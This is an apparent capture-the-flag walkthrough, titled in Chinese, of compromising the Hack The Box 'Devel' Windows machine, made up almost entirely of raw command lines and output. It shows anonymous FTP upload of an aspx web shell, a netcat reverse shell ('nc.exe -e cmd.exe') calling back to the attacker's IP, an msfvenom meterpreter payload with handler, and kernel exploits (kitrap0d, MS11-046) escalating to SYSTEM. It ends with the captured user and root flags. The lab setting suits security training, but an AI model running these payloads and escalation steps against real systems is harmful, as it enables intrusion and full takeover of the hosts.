记一次Devel靶机渗透测试演练实例

nmap -sC -sV -oA intense 10.129.152.23 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 19:04 UTC Nmap scan report for 10.129.152.23 Host is up (0.069s latency). Not shown: 998 filtered ports PORT   STATE SERVICE VERSION 21/tcp open  ftp     Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17  02:06AM                aspnet_client | 03-17-17  05:37PM                689 iisstart.htm |03-17-17  05:37PM                 184946 welcome.png | ftp-syst:  |  SYST: Windows_NT 80/tcp open  http    Microsoft IIS httpd 7.5 | http-methods:  |_  Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

ftp 10.129.152.23Connected to 10.129.152.23.220 Microsoft FTP ServiceName (10.129.118.104:root): Anonymous331 Anonymous access allowed, send identity (e-mail name) as password.Password:230 User logged in.Remote system type is Windows_NT.ftp> ls200 PORT command successful.125 Data connection already open; Transfer starting.03-18-17  02:06AM                     aspnet_client03-17-17  05:37PM                  689 iisstart.htm03-17-17  05:37PM               184946 welcome.png 226 Transfer complete

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put testh4x.txt  local: testh4x.txt remote: testh4x.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 32 bytes sent in 0.00 secs (1.0523 MB/s)

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous Password: 230 User logged in. Remote system type is Windows_NT. ftp> put cmd.aspx  local: cmd.aspx remote: cmd.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 1442 bytes sent in 0.00 secs (31.2545 MB/s)

sudo python smbserver.py share h4xploit/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [] Config file parsed  [] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  [] Config file parsed [] Config file parsed  [] Config file parsed

nc -lnvp 443 Listening on 0.0.0.0 443

\10.10.14.61sharenc.exe -e cmd.exe 10.10.14.61 443

 Connection received on 10.129.152.23 49159 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:windowssystem32inetsrv>whoami iis apppoolweb c:windowssystem32inetsrv> cd ../../.. c: cd Users c:Users>cd babis  cd babis Access is denied. c:Users>

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f aspx > h4xplo1t.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2884 bytes

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous Password: 230 User logged in. Remote system type is Windows_NT. ftp> put h4xplo1t.aspx  local: h4xplo1t.aspx remote: h4xplo1t.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2921 bytes sent in 0.00 secs (30.9520 MB/s)

msf6 > use exploit/multi/handler  msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name  Current Setting  Required  Description ----  ---------------  --------  ----------- Payload options (windows/meterpreter/reverse_tcp): Name      Current Setting  Required  Description ----      ---------------  --------  ----------- EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) LHOST                      yes       The listen address (an interface may be specified) LPORT     4444             yes       The listen port Exploit target: Id  Name --  ---- 0   Wildcard Target msf6 exploit(multi/handler) > set LHOST 10.10.14.61 LHOST => 10.10.14.61 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.61:4444

[*] Meterpreter session 1 opened (10.10.14.61:4444 -> 10.129.152.23:49164) at 2021-05-28 12:41:14 +0000 meterpreter > sysinfo Computer        : DEVEL OS              : Windows 7 (6.1 Build 7600). Architecture    : x86 System Language : el_GR Domain          : HTB Logged On Users : 0 Meterpreter     : x86/windows

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [] 10.129.152.23 - Collecting local exploits for x86/windows… [] 10.129.152.23 - 37 exploit checks are being tried… [+] 10.129.152.23 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 2 SESSION => 2 msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.61 LHOST => 10.10.14.61 msf6 exploit(windows/local/ms10_015_kitrap0d) > run [] Started reverse TCP handler on 10.10.14.61:4444  [] Launching notepad to host the exploit… [+] Process 3204 launched. [] Reflectively injecting the exploit DLL into 3204… [] Injecting exploit into 3204 … [] Exploit injected. Injecting payload into 3204… [] Payload injected. Executing exploit… [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [] Sending stage (175174 bytes) to 10.129.152.23 [] Meterpreter session 3 opened (10.10.14.61:4444 ->     10.129.152.23:49165) at 2021-05-28 12:51:59 +0000 meterpreter > shell Process 3484 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:windowssystem32inetsrv>whoami whoami nt authoritysystem c:windowssystem32inetsrv>

c:WindowsMicrosoft.NETFramework>10.10.14.61shareWatson.exe\10.10.14.61shareWatson.exe  [] OS Build number: 7600 [] CPU Address Width: 32 [] Process IntPtr Size: 4 [] Using Windows path: C:WINDOWSSystem32
[] Appears vulnerable to MS10-073 [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel. [>] Exploit: https://www.exploit-db.com/exploits/36327/ [>] Notes: None. 
[] Appears vulnerable to MS10-092 [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb[>] Notes: None. 
[] Appears vulnerable to MS11-046 [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges. [>] Exploit: https://www.exploit-db.com/exploits/40564/ [>] Notes: None.
[] Appears vulnerable to MS12-042 [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode. [>] Exploit: https://www.exploit-db.com/exploits/20861/ [>] Notes: None. 
[] Appears vulnerable to MS13-005 [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb [>] Notes: None. 
[] Finished. Found 5 vulns :)

c:Users>\10.10.14.61shareMS11-046.exe  c:WindowsSystem32>whoami whoami nt authoritysystem c:WindowsSystem32>

c:>cd Users/babis/Desktop c:UsersbabisDesktop>type user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8 c:UsersbabisDesktop>

c:Users>cd Administrator/Desktop  c:UsersAdministratorDesktop>type root.txt  e621a0b5041708797c4fc4728bc72b4b  c:UsersAdministratorDesktop>